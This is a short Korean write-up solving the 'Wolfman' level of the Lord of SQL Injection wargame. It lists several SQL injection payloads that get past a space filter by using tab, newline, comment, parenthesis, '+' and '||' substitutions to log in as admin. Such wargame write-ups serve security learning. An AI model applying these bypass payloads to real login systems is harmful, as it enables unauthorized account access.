Lord of SQL injection - Wolfman

문제 풀이

언뜻 보면 pw=' or id = 'admin';%23으로 풀 수 있을 것 같지만 코드를 보면 공백을 필터링하고 있다

불필요한 공백을 지우더라도 or과 id는 띄워야 한다

SQL에서 공백은 Tab, Line Feed, Carrage Return, 주석, 괄호, + 등으로 우회 가능하다

---

첫 번째 풀이

pw='or%09id='admin';%23

공백이 필요한 부분에 Tab(%09)을 넣어 필터링을 우회했다

불필요한 공백을 다 지웠지만 중간중간 Tab을 더 넣어도 문제는 없다

Tab 대신 LF(%0a), CR(%0d)를 넣어도 된다

---

두 번째 풀이

pw='or/**/id='admin';%23

pw='or(id)='admin';%23

pw='or%2bid='admin';%23

각각 주석, 괄호, +로 우회하였다

---

세 번째 풀이

pw='||id='admin';%23

공백이 나오지 않도록 or 대신 ||으로 써도 통과할 수 있다